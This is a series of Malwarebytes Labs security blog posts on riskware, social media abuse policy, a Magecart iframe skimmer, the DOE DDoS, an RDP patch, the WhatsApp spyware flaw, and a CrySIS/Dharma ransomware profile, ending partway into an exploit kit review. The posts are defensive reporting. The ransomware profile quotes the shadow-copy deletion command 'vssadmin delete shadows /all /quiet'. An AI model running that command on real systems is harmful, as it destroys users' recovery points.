Knowing when it’s worth the risk: riskware explained

If there’s one thing I like more than trivia quizzes, it’s quotes. Positive, inspirational, and motivational quotes. Quotes that impart a degree of ancient wisdom, or those that make you stop and consider. Reading them melts our fears, sorrows, and feelings of inadequacy away.

Some of the most inspiring quotes urge us to take risks in order to find meaning. If you don’t take risks, they say, you won’t be able to achieve remarkable things. The biggest risk, they say, is not taking a risk at all.

But when it comes to computer security, all that goes out the window. Taking risks on software you download onto your devices is not a recipe for success. Even if the programs are inherently benign, some may have features that can be used against you by those with malicious intent. No good can come of that.

What are these risky programs you’re talking about?

Did I lose you at “quotes?” That’s alright. These software programs that contain features that can easily be abused are known as riskware. They may come pre-installed on your computing device or they are downloaded and installed by malware.

How can something legit be a risk?

Such software was designed to have powerful features so it can do what it was programmed to do. Unfortunately, those same features can be used and/or abused by threat actors as part of a wider attack or campaign against a target. Riskware contains loopholes or vulnerabilities that can be exploited by cybercriminals and the threats they develop.

For example, there are monitoring apps available in the market that private individuals, schools, and businesses use to look after their loved ones, watch what their students are doing, or check employee activities. Those with ill intent could take over these apps to stalk certain individuals or capture sensitive information via logging keystrokes.

Read: When spyware goes mainstream

Riskware can be on mobile devices, too. On Android, there are apps created with an auto-install feature that have system-level rights and come pre-installed on devices; therefore, they cannot be removed (but can be disabled). The auto-installer we detect as Android/PUP.Riskware.Autoins.Fota, however, cannot be manually deactivated. Once exploited, it can be used to secretly auto-install malware onto susceptible devices.

Note that if you install software that your anti-malware program detects as riskware, then you need only make sure your security program is updated to stay safe.

How can you tell which software is riskware?

There are varying levels of malicious intent and capabilities for all software. In fact, any program should be assumed to have potential flaws and vulnerabilities that can be exploited. However, there are criteria for determining what is considered malware vs. riskware, and which software is deemed “safe.”

Pieter Arntz, malware intelligence researcher and riskware expert, makes this clear when he said that riskware can be classified based on the risks to data and devices involved.

“In my opinion, there are a few major categories of riskware, and you can split them up by type of risk they introduce,” Arntz said. “Some bring risk to the system because they introduce extra vulnerabilities, such as unlicensed Windows with updates disabled. Some bring risk to the user because having them is forbidden by law in some countries, such as hacking tools.”

Arntz continues: “Some monitor user behavior. When this is by design, a software may be labelled as riskware rather than spyware. Some bring risk to the system because they are usually accompanied by real malware, and their presence can be indicative of an infection. [And] some bring risk to the user because their use is against the Terms of Service of other software on the system, such as cracks.”

What’s the difference between riskware and PUPs?

Riskware and potentially unwanted programs (PUPs) are similar in that their mere presence could open systems up to exploitation. So, it’s no surprise that users might liken one to the other. However, there are different criteria for classifying riskware and PUPs.

Programs might be termed riskware because they put the user at risk in some way by:

  • Violating the terms of service (ToS) of other software or a user platform on the device.
  • Blocking another application or software from being updated and patched.
  • Being illegal in the user’s country.
  • Potentially being used as a backdoor for other malware.
  • Being indicative of the presence of other malware.

Whereas programs might be considered PUPs because:

  • They may have been installed without the user’s consent.
  • They may be supported by aggressive advertisements.
  • They may be bundlers or part of a bundle.
  • They may be misleading or offer a false sense of security.

Regardless of whether a program is a PUP or riskware, it’s important to evaluate critically whether or not the software is as useful and relevant as it is a nuisance or a potential risk.

Should I keep quarantined riskware or remove it?

If your anti-malware program detects and quarantines riskware, you likely have a choice whether or not to keep it. Our advice is to make a decision based on whether or not you installed the riskware yourself and then, if you did, weighing the benefits of the app against the risks outlined in the detection.

If riskware was installed without the user’s knowledge, it’s possible the software is part of an attack ensemble delivered by malware. I’d be more worried about the presence of malware in this case, and would delete the offending riskware.

If you want your anti-malware to stop detecting software you use that is classified as riskware, see if you can configure your security solution to exclude the file or whitelist it. That way, the software won’t be detected in the future. Want to know how to do this with your Malwarebytes product? Go here.

Stay safe out there!

The post Knowing when it’s worth the risk: riskware explained appeared first on Malwarebytes Labs.

Governments increasingly eye social media meltdown

These are trying times for social networks, with endless reports of harassment and abuse not being tackled and many users leaving platforms forever. The major sites such as Facebook and Twitter do what they can, but sheer userbase volume and erroneous automated feedback leave people cold. Bugs such as potentially sharing location data when users enable it alongside other accounts on the same phone are something we’ve come to expect.

Just recently, Twitter and Instagram started trying to filter out what they consider to be erroneous information about vaccines, displaying links to medical information sites amongst search results.

Elsewhere, major portals are trying to establish frameworks for hate speech, or fight the rising tide of trolls and fake news. One of Facebook’s co-founders recently had some harsh words for Zuckerberg, claiming the recent catalogue of issues make a good case for essentially breaking the site up. It’s not that long ago since the so-called Cambridge Analytica scandal came to light, which continues to reverberate about security and privacy circles.

It was always burning

Wherever you look, there’s a whole lot of fire fighting going on and no real solutions on the horizon. In many ways, the sites are too big to fail and the various alternatives that spring up never quite seem to catch on. Mastadon made a huge splash at launch and seems to have a lot more success at tackling abuse than the big guns, but by the  same token, lots of people tried it for a month and never went back. Smaller, decentralised instances with dedicated admins/moderators went a long way toward keeping things usable, but ultimately it seems it was just too niche for people more versed with the familiar sights and sounds of Twitter.

Dogpiling from other regions focused on destabilizing the very platforms being used at any given time only adds fuel to the fire.

To summarise, not the greatest of times being had by social media portals. Bugs will come and go, and sneaky individuals will always try to game systems with spam or political propaganda. Most people would (probably?) agree that abuse is where the bulk of the issues and concerns lie. There’s nothing more frustrating then seeing people hounded by a service they make use of with no tools available to fight it.

The fightback begins

Here’s some of the ways sites are looking to tackle the abuse challenge before them.

1) Twitter has sanitised the way accounts interact for some time. The quality filters make it more difficult to witness drive-by abuse postings sent your way via a few changes of the settings. Assuming you don’t follow people sending you nonsense, then you’ll miss most of the barrage.

No confirmed email address? No confirmed phone number? Sporting a default profile avatar? Brand new accounts? All of these points and more will help keep the bad tweets at bay. Muting is also a lot more reliable than it used to be. A good opening salvo, but still more can be done.

Using this as a starting point, Twitter is now finding ways to combine these outliers of registration with actual user behaviour and the networks in which they operate to weed out bad elements. For example,

“We’re also looking at how accounts are connected to those that violate our rules and how they interact with each other,” Twitter executives wrote in the post. “These signals will now be considered in how we organize and present content in communal areas like conversation and search.”

This would suggest that even if, say, your account ticks enough boxes to avoid the quality filter, you may not escape the algorithm hiding your tweets if it feels you spend a fair portion of time interacting with abusers. Those abusive accounts may also be discreetly hidden from view when browsing popular hashtags in an effort to prevent them from gaming the system.

It seems Twitter needs to balance out hiding abusive messages and clever, sustained trolling versus simply removing content from plain view that one may disagree with but isn’t actually abusive. This will be quite a challenge.

2) Political shenanigans cover the full range of social media sites, coming to prominence in the 2016 US election and beyond. Once large platforms began digging into their data in this realm, they found a non-stop stream of social engineering and manipulation alongside flat out lies. 100,000 political images were shared on open WhatsApp groups in the run-up to the 2018 Brazilian elections, and more than half contained mistruths or lies.

Facebook is commissioning studies into human rights impacts on places like Myanmar due to how the platform is used there. Last year, Oxford University found evidence of high-level political manipulation on social media in 48 countries.

These are serious problems. How are they being addressed long term?

Fix it…or else?

In a word, slowly.

Lawmaker pressure has resulted in some changes at the top. People and organisations wanting to place political ads on Facebook or Google must now supply the identity behind the ad in some regions. This is to combat the dubious tactic known as “dark advertising,” where only the intended target of an ad can see it—usually with zero indication as to who made it in the first place. WhatsApp is cutting down on message forwarding to try and prevent the spread of political misinformation.

Right now, the biggest players are gearing up for the European Parliament Elections—again, with the possible threat of action hanging over them should they fail to do an acceptable job. If they don’t remove bogus accounts quickly enough, if they fail to be rigorous and timely with fact checking and bad article deletion, then regulators could turn up the pressure on the Internet giants.

Canning the spam with a banhammer

It’s not all doom and slow-moving gloom, though. It’s now more common to see platforms making regular public-facing statements about how the war on fakery is going.

Facebook recently made an announcement that they’ve had to remove:

265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in coordinated inauthentic behavior. This activity originated in Israel and focused on Nigeria, Senegal, Togo, Angola, Niger and Tunisia along with some activity in Latin America and Southeast Asia. The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians.

That’s a significant amount of time sunk into one coordinated campaign. Of course, there are many others and Facebook can only do so much at a time; all the same, this is encouraging. While it may be a case of too little, too late for social media platforms as a whole to start cracking down on abusive patterns now accepted as norms, they’re finally doing something to tackle the rot. All the while, governments are paying close attention.

UKGov steps up to the plate

The Jo Cox Foundation will work alongside politicians of all parties to tackle aspects of abuse online, which can lead to catastrophic circumstances. Their paper [PDF format] is released today, and has a particularly lengthy section on social media.

It primarily looks  at how people desiring to work in public office are being hammered on all sides by online abuse, and how it then filters down into various online communities. It weighs up the realities of current UK lawmaking…

The posting of death threats, threats of violence, and incitement of racial hatred directed towards anyone (including Parliamentary candidates) on social media is unambiguously illegal. Many other instances of intimidation, incitement to violence and abuse carried out through social media are also likely to be illegal.

…with the reality of the message volume people in public-facing roles are left with:

Some MPs receive an average of 10,000 messages per day

Where do you begin with something like that?

Fix it or else, part 2

Slap bang in the middle of multiple quoted comments from social media sites explaining how they’re tackling online abuse/trolling/political dark money campaigns, we have this:

It is clear to us that the social media companies must take more responsibility for the content posted and shared on their sites. After all, it is these companies which profit from that content. However, it is also clear that those companies cannot and should not be responsible for human pre-moderation of all of the vast amount of content uploaded to their sites.

Doesn’t sound too bad for the social media companies, right? Except they also go on to say this:

Government should bring forward legislation to shift the liability of illegal content online towards social media companies.

Make no mistake, what social media platforms want versus what they’re able to realistically achieve may be at odds with this timetable:


Click to enlarge

The battle lines, then, are set. Companies know there’s a problem, and it’s become too big to hope for some form of self-resolution. Direct, hands-on action and more investment in abuse/reporting methods, along with more employees to handle such reports, are sorely needed. At this point, if social media organisations can’t set this one to rest, then it looks as though someone else may go and do it for them. Depending on how that pans out, we may feel the after effects for some time to come.

The post Governments increasingly eye social media meltdown appeared first on Malwarebytes Labs.

Skimmer acts as payment service provider via rogue iframe

Criminals continue to target online stores to steal payment details from unaware customers at a rapid pace. There are many different ways to go about it, from hacking the shopping site itself, to compromising its supply-chain.

A number of online merchants externalize the payment process to a payment service provider (PSP) for various reasons, including peace of mind that transactions will be handled securely. Since some stores will not process payments on their own site, one might think that even if they were compromised, attackers wouldn’t be able to steal customers’ credit card data.

But this isn’t always true. RiskIQ previously detailed how Magecart’s Group 4 was using an overlay technique that would search for the active payment form on the page and replace it with one prepped for skimming.

The one we are looking at today adds a bogus iframe that asks unsuspecting customers to enter their credit card information. The irony here is that the shopping site itself wouldn’t even ask for it, since visitors are normally redirected to the external PSP.

Skimmer injects its own credit card fields

Small and large online retailers must adhere to security requirements from Payment Card Industry Data Security (PCI-DSS) that go well beyond using SSL for their payment forms. Failing to do so can lead to large fines and even the cancellation of their accounts.

One of the most popular e-commerce platforms, Magento, can help merchants be PCI compliant via its Magento Commerce cloud product or integrated payment gateways and hosted forms without sensitive data flowing through or stored on the Magento application server itself.

During one of our web crawls, we spotted suspicious activity from a Magento site and decided to investigate further. The following image depicts two slightly different checkout pages based on the same platform, with the one on the right being the suspicious site we had identified.

On the left, the expected payment form; on the right the one with a rogue iframe.

What we notice are new fields to enter credit card data that did no exist on the left (untampered form). By itself, this may not be out of the ordinary since online merchants do use such forms (including iframes) as part of their checkout pages.

But there are some things that just don’t add up here. For example, right below the credit card field is text that says, “Then you will be redirected to PayuCheckout website when you place an order.” Why would a merchant want to get their customers to type in their credit card again and hurt their conversion rate?

And indeed the unsuspecting shopper will then be taken to another— legitimate this time—payment form to re-enter their credit card details. This should be an immediate red flag if you have to type in your information twice. This is the kind of scenario we typically see with phishing sites as well.

The legitimate (external) payment form

At this point, we know that this e-commerce site is yet another victim that fell into the hands of one the Magecart groups. In the following section, we look into at how this attack works.

A three-step exfiltration process

The Magento site has been hacked and malicious code injected into all of its pages. However, the most important one that we are going to look at is the actual checkout page.

The crooks first load their own innocuous iframe to collect the credit card data, which is then validated before being exfiltrated.

Traffic capture showing the steps involved in credit card theft

As we mentioned, injected code is present in all the PHP pages of that site, but it will only trigger if the current URL in the address bar is the shopping cart checkout page (onestepcheckout). Some extra checks (screen dimensions and presence of a web debugger) are also performed before continuing.

Injected snippet that checks for certain elements before loading the full skimmer

If the right conditions are met, an external piece of JavaScript is loaded from thatispersonal[.]com, a domain registered with REGISTRAR OF DOMAIN NAMES REG.RU LLC and hosted in Russia.

It’s worth noting that directly browsing to this URL without the correct referer (one of the hacked Magento sites) will return a decoy script instead. The complete script is largely obfuscated and creates the iframe-box we saw above for harvesting credit card details at the right place on screen.

The rogue, previously non-existent credit card fields

It also loads another long and yet again obfuscated script ([hackedsite]_iframe.js) where “hackedsite” is the name of the e-commerce site that was hacked. Its job is to process, validate, and then exfiltrate the user data.

A familiar sight, with data elements to be scraped and exiltrated

That data is sent via a POST request to the same malicious domain in a custom encoded format.

The network request that exfiltrates the stolen data

The diversity of skimmers and attacks

This particular skimmer evolved slightly over time and wasn’t always used for the rogue iframe technique. Historical scans archived on show some changes with obfuscation going from a hex encoded array to string manipulation using split and join methods.

Criminals have many different ways of stealing data from online shoppers with web skimmers. While supply-chain attacks are the most damaging because they usually affect a larger number of stores, they are also more difficult to pull off.

Compromising vulnerable e-commerce sites via automated attacks is the most common approach. Once the skimmer is injected into the payment page, it can steal any data that is entered and immediately send it to the crooks. As we have seen in this article, even e-commerce sites that do not collect payment data themselves can be affected when the attackers inject previously non-existent credit card fields into the checkout page.

For online shoppers, this trick will be difficult to spot early on and perhaps only after being prompted for the same information again will they become suspicious.

While it is important for e-commerce sites to get remediated in order to prevent further theft, we know this process can be delayed for one reason or another. This is why we focus on the exfiltration gates to protect our customers in the event that they happen to be shopping on a compromised store.

Further reading

Indicators of Compromise (IoCs)


The post Skimmer acts as payment service provider via rogue iframe appeared first on Malwarebytes Labs.

A week in security (May 13 – 19)

Last week, Malwarebytes Labs reviewed active and unique exploit kits targeting consumers and businesses alike, reported about a flaw in WhatsApp used to target a human rights lawyer, and wrote about an important Microsoft patch that aimed to prevent a “WannaCry level” attack. We also profiled the Dharma ransomware—aka CrySIS—and imparted four lessons from the DDoS attack against the US Department of Energy that disrupted major operations.

Other cybersecurity news

  • Cybersecurity agencies from Canada and Saudi Arabia issued advisories about hacking groups actively exploiting Microsoft SharePoint server vulnerabilities to gain access to private business and government networks. A different patch for the flaw, which was officially designated as CVE-2019-0604, was already available as of February this year. (Source: ZDNet)
  • Nefarious actors behind adware try hard to be legit—or at least look the part. A recent discovery of a pseudo-VPN called Pirate Chick VPN in an adware bundle was one of the ways they attempted to do this. However, the software is actually a Trojan that pushes malware, particularly the AZORult information stealer. (Source: Bleeping Computer)
  • SIM-swapping, the fraudulent act of convincing a mobile carrier to swap a target’s phone number over to a SIM card owned by the criminal, doubled in South Africa. This scam is used to divert incoming SMS-based tokens used in 2FA-enabled accounts. (Source: BusinessTech)
  • Ransomware attacks on US cities are on the uptick. So far, there have been 22 known attacks this year. (Source: ABC Action News)
  • Typosquatting is back on the radar, and it’s mimicking online major new websites to push out fake news or disinformation reports, according to a report from The Citizen Lab. Some of the sites copied were Politico, Bloomberg, and The Atlantic. The group behind this campaign is Endless Mayfly, an Iranian “disinformation supply chain.” (Source: The Citizen Lab)
  • No surprise here: Researchers from Charles III University of Madrid (Universidad Carlos III de Madrid) and Stony Brook University in the US found that Android smartphones are riddled with bloatware, which creates hidden privacy and security risks to users. (Source: Sophos’s Naked Security Blog)
  • Organizations who are using the cloud to store PII were considering moving back to on-premise means to store data due to cloud security concerns, according to a survey. (Source: Netwrix)
  • The Office of the Australian Information Commissioner (OAIC) recently released a report about their findings on breaches in healthcare, which is still an ongoing problem. They found that such breaches were caused mainly by human error. (Source: CRN)
  • Websites of retailers are continuously facing billions of hacking attempts every year, according to an Akamai Technology report. Consumers should take this as a wake-up call to stop reusing credentials across all their online accounts. (Source: BizTech Magazine)
  • After the discovery of Meltdown and Spectre, security flaws found in Intel and AMD chips, several researchers have again uncovered another flaw that could allow attackers to eavesdrop on every piece of user data that a processor touches. Intel collectively calls attacks against this flaw as Microarchitectural Data Sampling (MDS). (Source: Wired)

Stay safe, everyone!

The post A week in security (May 13 – 19) appeared first on Malwarebytes Labs.

4 Lessons to be learned from the DOE’s DDoS attack

Analysts, researchers, industry professionals, and pundits alike have all posited the dangers of the next-generation “smart grid,” particularly when it comes to cybersecurity. They warn that without the right measures in place, unscrupulous parties could essentially wreak havoc on the bulk of society by causing severe outages or worse.

It is a real possibility, but up until now, it’s been something that’s largely hypothetical in nature. In March, an unidentified power company reported a “cyber event” to the Department of Energy (DOE) that caused major disruptions in their operations. While the event did not cause a blackout or power shortage, it was likened to the impact of a major interruption, including events like severe storms, physical attacks, and fuel shortages.

It’s easy to dismiss this as a one-off event, especially since there was no energy disruption to the public as a result. But, in fact, the exact opposite should be inferred from this. It’s merely the first toe over the line in a world where cyberattacks are consistently growing more dangerous, highlighting the need to understand and improve security moving forward.

What lessons can be learned from this attack, and what can hopefully be done to mitigate risk in the future?

1. Disruption comes in many forms

Almost immediately, the attack could be dismissed because it didn’t cause power outages or severe disruptions, but that’s the kind of ostrich-in-the-sand approach that leads to vulnerability in the future. Disruptions or delays can come in many forms, especially for utility providers.

When an attack is identified, the appropriate response teams must dedicate resources to dealing with the oncoming wave. That is essentially costing valuable hours and money, but it’s also taking those teams away from more important tasks. A particularly nasty attack could cause crews to pause or delay certain activities simply to cooperate with an investigation. That could then result in a provider losing efficiency, capabilities, or worse.

At the very least, providers that incur significant costs would need to recuperate the money somehow, and that will most likely roll back into pricing. It’s hard to imagine a minor cyberattack having such an impact on the market, but it’s a definite possibility.

2. Many cyberattacks are easily preventable

Sophisticated cyberattacks can cause a lot of damage, but many of them can be easily prevented with the right security in place. According to an official, the DOS event reported to the DOE happened because of a known software vulnerability that required a patch to fix—a patch that had also been previously published. Hitting “update” would have thwarted the attack.

There’s no further information about what, specifically, was attacked. It could have been computers or workstations, or other Internet-facing devices or network tools. Attackers could have stolen data, proprietary files, or held systems up for ransom. Whatever the damage done, it could have easily been prevented.

A recent study revealed that 87 percent of all focused attacks from January to mid-March 2018 were prevented. This was achieved through a combination of measures, the first being the adoption of breakthrough technologies.

But, just as important to stopping attacks is building a strong and proactive security foundation. The latter requires vigilant maintenance for the systems and devices in question, which would including updating the tech and applying security patches for known exploits.

3. DDoS attacks should be taken seriously

Today’s DoS and DDoS attacks are different seeing as they are more vicious, pointed, and capable. Originally, launching a DDoS attack meant sending a huge bulk of requests to an IP address that overload the related systems and lock out legitimate requests. Generally, while these attacks do come from a few different computers and sources, they use less complex request methods.

The problem with the current landscape is not just that the attacks have become more sophisticated themselves, but that there are so many more potential channels. The Mirai botnet, for example, took advantage of IoT devices such as security cameras, smart home tech, and more. In turn, this makes the scale and capability of the attack much stronger because there are so many more devices involved, and there’s so much more data flowing into the targeted systems.

A massive distributed-denial-of-service attack can take down company websites, entire networks or— in the case of Mirai—nearly the entire Internet. For utility providers this kind of attack could prove disastrous to operations, inundating network servers and equipment with requests and blocking out official communications.

DDoS attacks should be taken more seriously, and today’s enterprise world should be focused on preventing and protecting from them as much as any other threat. Most cloud service providers already do a great job protecting against these attacks. It becomes a real issue when hackers can take advantage of existing vulnerabilities, just as they did with the DOE event.

4. They aren’t time-limited

In the TechCrunch report about the incident, it’s revealed that the attack caused “interruptions of electrical system operation” for a period of over 10 hours. Ten hours is a decent amount of time, and it provides a glimpse at just how prolonged these threats can be. Network layer attacks can last longer than 48 hours, while application layer attacks can go on for days. Infiltration of systems and networks for spying—weeks and months.

It adds another layer to the problem, beyond general security. These attacks can last for increasingly long periods of time, and when it comes to utility providers and the smart grid, that could potentially mean lengthy service disruptions.

Imagine being without power or water for over 60 days because of a sophisticated DDoS attack? While not likely, such a scenario highlights the need to find backup solutions to the problem.

What, for instance, are these providers doing to ensure services are properly backed up and supported during large-scale cyberevents?

Cybersecurity should be a priority

The key takeaway here is that cybersecurity, in general, should be one of the highest priorities for all entities operating in today’s landscape, utility providers included. These attacks have grown to be sophisticated, targeted, capable, and more rampant.

The argument to be made isn’t necessarily that protecting from any one form of attack should be more important than others. It’s that all threats should be taken seriously, including DDoS attacks, which are growing more common. To make matters worse, there’s a much larger pool of channels and devices with which attacks can originate, and they can be carried out over long periods of time.

This increased risk poses some additional questions. Is the smart grid truly ready for primetime? Can it hope to compete against such threats? If cybersecurity is baked into its design, it has a fight chance.

The post 4 Lessons to be learned from the DOE’s DDoS attack appeared first on Malwarebytes Labs.

Microsoft pushes patch to prevent ‘WannaCry’ level vulnerability

This month marks the two-year anniversary since the infamous WannaCry attack. As an anniversary present to the world, Microsoft has pushed out patches to secure a newly-identified Remote Desktop Protocol (RDP) vulnerability found in certain Windows operating systems.

The potential damage of the newly-discovered RDP vulnerability matches the same dangers we experienced with the WannaCry ransomware, a malware that utilized weaponized vulnerabilities to infect systems across the globe, basically acting as a worm. This same RDP vulnerability allows attackers to execute code on the targeted system without needing to infect the system first.

So, worst-case-scenario? A WannaCry wannabe will quickly spread malware across the world, exploiting vulnerable systems and sending everyone into a panic.

How to patch the vulnerability

So how do you fix this? Luckily, Microsoft has released patches for vulnerable operating systems, which includes most operating systems pre-Windows 8:

Anyone who is running Windows 8, 10, or any of the modern Windows Server operating systems is not vulnerable to this threat.

If you have one of the aforementioned operating systems currently running and connected to the Internet, you’ll need to update as soon as possible. Not all of these operating systems are out of support for Microsoft, and those who have automatic updates should be fine and patched already.

However, if you are unable to enable automatic updates, or you are still running Windows XP and/or Windows Server 2003, you’ll need to download the patch and manually execute it.

For those of you who need to update manually, just click on the operating system you are working with and you’ll be navigated to the Microsoft patch download page, which has the patches you need to download.

Security researcher Kevin Beaumont identified millions of vulnerable systems on

Learning from history

RDP has historically been an avenue for attackers attempting to break into systems and/or drop malware, but we’ve noticed an uptick in RDP attacks against businesses over the last year. With that in mind, even after patching, you should consider checking out our guide on how to protect RDP from ransomware attacks.

The incident with WannaCry in 2017 has forever changed the perception of how to launch an effective attack against a large portion of the world. We’ve observed exploits used by this threat in modern commercial malware, such as Emotet and TrickBot.

It would not be out of the realm of possibility that within the next few weeks, this vulnerability will be weaponized and used against consumers and businesses who fail to patch and protect their networks. Don’t be a statistic. Protect your machines, data, networks, and users right now.

The post Microsoft pushes patch to prevent ‘WannaCry’ level vulnerability appeared first on Malwarebytes Labs.

Threat spotlight: CrySIS, aka Dharma ransomware, causing a crisis for businesses

CrySIS, aka Dharma, is a family of ransomware that has been evolving since 2006. We have noticed that this ransomware has become increasingly active lately, increasing by a margin of 148 percent from February until April 2019. The uptick in detections may be due to CrySIS’ effective use of multiple attack vectors.

graph number of detections

Profile of the CrySIS ransomware

CrySIS/Dharma, which Malwarebytes detects as Ransom.Crysis, targets Windows systems, and this family primarily targets businesses. It uses several methods of distribution:

  • CrySIS is distributed as malicious attachments in spam emails. Specific to this family is the use of malicious attachments that use double file extensions, which under default Windows settings may appear to be non-executable, when in reality they are.
  • CrySIS can also arrive disguised as installation files for legitimate software, including AV vendors. CrySIS operators will offer up these harmless looking installers for various legitimate applications as downloadable executables, which they have been distributing through various online locations and shared networks.
  • Most of the time, CrySIS/Dharma is delivered manually in targeted attacks by exploiting leaked or weak RDP credentials. This means a human attacker is accessing the victim machines prior to the infection by brute-forcing the Windows RDP protocol on port 3389.

In a recent attack, CrySIS was delivered as a download link in a spam email. The link pointed to a password-protected, self-extracting bundle installer. The password was given to the potential victims in the email and, besides the CrySIS/Dharma executable, the installer contained an outdated removal tool issued by a well-known security vendor.

This social engineering strategy worked to bring down user defenses. Seeing a familiar security solution in the installation package tricked users into believing the downloadable was safe, and the attack was successful.

The infection

Once CrySIS has infected a system, it creates registry entries to maintain persistence and encrypts practically every file type, while skipping system and malware files. It performs the encryption routine using a strong encryption algorithm (AES-256 combined with RSA-1024 asymmetric encryption), which is applied to fixed, removable, and network drives.

Before the encryption routine, CrySIS deletes all the Windows Restore Points by running the vssadmin delete shadows /all /quiet command.

The Trojan that drops the ransomware collects the computer’s name and a number of encrypted files by certain formats, sending them to a remote C2 server controlled by the threat actor. On some Windows versions, it also attempts to run itself with administrator privileges, thus extending the list of files that can be encrypted.

After a successful RDP-based attack, it has been observed that before executing the ransomware payload, CrySIS uninstalls security software installed on the system.

The ransom

When CrySIS has completed the encryption routine, it drops a ransom note on the desktop for the victim, providing two email addresses the victim can use to contact the attackers and pay the ransom. Some variants include one of the contact email addresses in the encrypted file names.

The ransom demand is usually around 1 Bitcoin, but there have been cases where pricing seems to have been adapted to match the revenue of the affected company. Financially sound companies often have to pay a larger ransomware sum.

crysis ransom note

Some of the older variants of CrySIS can be decrypted using free tools that have been made available through the NoMoreRansom project.


While you do have a choice to deploy other software to remotely operate your work computers, RDP is essentially a safe and easy-to-use protocol with a client that comes pre-installed on Windows systems, as well as clients available for other operating systems. There are a few measures you can take to make it a lot harder to gain access to your network over unauthorized RDP connections:

Network Level Authentication
  • Change the RDP port so port-scanners looking for open RDP ports will miss yours. By default, the server listens on port 3389 for both TCP and UDP.
  • Or use a Remote Desktop Gateway Server, which also gives you some additional security and operational benefits like 2FA. The logs of the RDP sessions can prove especially useful when you are trying to figure out what might have happened. As these logs are not on the compromised machine, they are harder to falsify by intruders.
  • Limit access to specific IPs, if possible. There should be no need for a whole lot of IPs that need RDP access.
  • There are several possibilities to elevate user privileges on Windows computers, even when using RDP, but all of the known methods have been patched. So, as always, make sure your systems are fully up-to-date and patched to prevent privilege elevation and other exploits from being used.
  • Use an effective and easy-to-deploy backup strategy. Relying on Restore Points doesn’t qualify as such and is utterly useless when the ransomware first deletes the restore points, as is the case with CrySIS.
  • Train your staff on the dangers of email attachments and downloading files from unofficial sources.
  • Finally, use a multi-layered, advanced security solution to protect your machines against ransomware attacks.
crysis quarantined


Ransom.Crysis has been known to append these extensions for encrypted files:

.crysis, .dharma, wallet, .java, .adobe, .viper1, .write, .bip, .zzzzz, .viper2, .arrow, .gif, .xtbl, .onion, .bip, .cezar, .combo, .cesar, .cmb, .AUF, .arena, .brrr, .btc, .cobra,  .gamma, .heets, .java, .monro, .USA, .bkp, .xwx, .btc, .best, .bgtx, .boost, .heets, .waifu, .qwe, .gamma, .ETH, .bet, ta, .air, .vanss, . 888, .FUNNY, .amber, .gdb, .frend, .like, .KARLS, .xxxxx, .aqva, .lock, .korea, .plomb, .tron, .NWA, .AUDIT, .com, .cccmn, .azero, .Bear, .bk666, .fire, .stun, .myjob, .ms13, .war, .carcn, .risk, .btix, .bkpx, .he, .ets, .santa, .gate, .bizer, .LOVE, .LDPR, .MERS, .bat, .qbix, .aa1, and .wal

The following ransom note names have been found:

  • README.txt
  • Readme to restore your files.txt
  • Decryption instructions.txt
  • Files encrypted!!.txt
  • Info.hta

Common file hashes:

  • 0aaad9fd6d9de6a189e89709e052f06b
  • bd3e58a09341d6f40bf9178940ef6603
  • 38dd369ddf045d1b9e1bfbb15a463d4c

The post Threat spotlight: CrySIS, aka Dharma ransomware, causing a crisis for businesses appeared first on Malwarebytes Labs.

WhatsApp fix goes live after targeted attack on human rights lawyer

If you use WhatsApp, you’ll want to update both app and device as soon as possible due to a freshly-discovered exploit. The vulnerability was found in Google Android, Apple iOS, and Microsoft Windows Phone builds of the app.

Unlike many mobile attacks, potential victims aren’t required to install or click on anything—they may not even be aware something malicious has taken place.

This attack came to light after CitizenLab suspected a human rights lawyer was being targeted, and after observing, deduced that they were, but the attacks were blocked by the fixes WhatsApp put in place.

We should stress these are smart, high-level attacks and not typically rolled out to target random people. No need to start panicking. Just apply fixes as required, and go about your day.

What typically happens with a mobile attack?

A large portion of mobile attacks usually involve some form of social engineering. Mobile manufacturers insist customers use their own closed ecosystem store to lessen the risk of becoming infected by something out in the wild.

For example, iPhone users can only download apps from iTunes. And Android devices have installs from third parties or unknown sources switched off by default. This means if your child ends up on a fake Angry Birds website offering up a bogus installer, they won’t be able to install the app because the device won’t allow it (unless you switched off the default settings).

While bad files can and do lurk on official mobile stores, ignoring unknown source installs definitely helps keep infection numbers down.

This sounds like a non-typical mobile hijack

That would definitely be the case.

The WhatsApp team worked out that a simple missed call was all it took to inject commercial spyware into the device. The call, made using WhatsApp’s voice call function, would lead to the infection being installed on the phone silently. It appears all record of the call log would be scrubbed too, so the victim wouldn’t even be aware something was amiss.

This is similar to how malware on the desktop will often delete files after the event to remain as stealthy as possible. When this happens, it can take a long time before someone realises what’s up. When they do, it’s usually too late, and the attackers have already reached their chosen objective.

What is the impact?

Whether your mobile device is used for something important or you do little beyond making calls, this exploit could do some serious damage. The spyware can scan messages and emails, alongside grabbing location data. Even if you think malware on your phone isn’t a big deal because you don’t do anything important on it, the attackers have something for everyone. Namely, the ability to turn on a phone’s microphone and camera, access photos, contacts, and more.

Given the stealthy way the attack was attempted, it’s impressive that WhatsApp caught it as quickly as they did. Engineers at Facebook have been busy sorting this one out over the weekend.

Is there an advisory?

There sure is. Named CVE-2019-3568, the advisory reads as follows:

Description: A buffer overflow vulnerability in WhatsApp VOIP stack allowed remote code execution via specially crafted series of SRTCP packets sent to a target phone number.

Affected Versions: The issue affects WhatsApp for Android prior to v2.19.134, WhatsApp Business for Android prior to v2.19.44, WhatsApp for iOS prior to v2.19.51, WhatsApp Business for iOS prior to v2.19.51, WhatsApp for Windows Phone prior to v2.18.348, and WhatsApp for Tizen prior to v2.18.15.

Last Updated: 2019-05-13

What do we do now?

In a word, update. If your apps and devices are set to update automatically, you should be good to go. If not, go and update manually as soon as possible. As mentioned earlier, you probably shouldn’t worry about having been infected, as it seems to have been a carefully targeted attack. There’s an excellent chance you’re not on the radar.

In fact, if your updates aren’t set to automatic, your immediate concerns should be about more mundane security threats. Please consider switching to automatic and save yourself needless worries.

For more information on general mobile security, feel free to check out our guide to spotting mobile phishes, and some simple tips for good mobile hygiene. With that, plus Malwarebytes’ security apps for Android and iOS, you should be good to go.

The post WhatsApp fix goes live after targeted attack on human rights lawyer appeared first on Malwarebytes Labs.

Exploit kits: spring 2019 review

Exploit kit activity remains fairly unchanged since our last winter review in terms of active distribution campaigns. But this spring edition will feature a new exploit kit and another atypical EK, in that it specifically goes after routers.

The main driver behind these drive-by download attacks are various malvertising chains with strong geolocation filtering. This explains why some exploit kits will be less visible than others.

